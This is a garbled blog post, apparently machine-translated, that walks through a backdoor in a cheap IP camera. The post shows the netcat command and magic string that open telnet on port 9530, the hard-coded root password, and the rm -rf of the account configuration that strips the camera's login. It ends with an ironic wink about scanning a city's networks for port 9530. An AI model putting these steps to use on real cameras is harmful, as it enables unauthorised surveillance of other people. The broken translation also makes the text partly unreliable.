You are the big brother, or try yourself in the role of an all-seeing eye
Tale-tale
I bought one gentleman’s door reliable, cast-iron with locks for dohliard combinations, but after installation the hinges began to creak. He called a specialist, sits in his kitchen, waits for tea, drinks, the installer suddenly comes to him and says in a human voice, "
Nonsense, you think, it only happens in fairy tales and you will be fundamentally wrong
In this post I will convincingly and with examples convincingly prove that such developers exist.
Somehow I got into the hands of an IP camera from a country famous for its unique quality of manufactured equipment, with a password unknown, google resetting the settings led me to a utility that reset this password, but the way that it makes me interested in it.
That's what was discovered on camera initially.
Host is up (0.0014s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
80 / tcp open http
554 / tcp open rtsp
8899 / tcp open ospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
WEB is password protected. CLI no.
We start tcpdump, we start the password reset utility.
We see that the command \ rOpenTelnet: OpenOnce is sent to port 9530 tcp. After that, telnet opens on the device and the program goes to port 23 and with the help of predefined passwords resets the configuration regarding the passwords.
Let's try to do everything manually
1. Open telnet on the camera
nc 192.168.1.10 9530
\ rOpenTelnet: OpenOnce
check that it is open
nmap -p 1-65535 192.168.1.10
PORT STATE SERVICE
23 / tcp open telnet
80 / tcp open http
554 / tcp open rtsp
8899 / tcp open ospf-lite
9527 / tcp open unknown
9530 / tcp open unknown
34567 / tcp open unknown
We go under the standard password
telnet 192.168.1.10
Trying 192.168.1.10 ...
Connected to 192.168.1.10.
Escape character is '^]'.
LocalHost login: root
Password: xmhdipc
Welcome to Monitor Tech.
# rm -rf / mnt / mtd / Config / Account *
# reboot
# Connection closed by foreign host.
After rebooting, the camera is accessible via the web without a password. Enjoy it.
What the equipment manufacturer is guided by when it leaves such holes is not clear to me personally.
Dear readers, never scan the network of the city you would like to observe for open port 9530, and do not perform the actions described above, this may lead to a desire to go on vacation or go on a trip.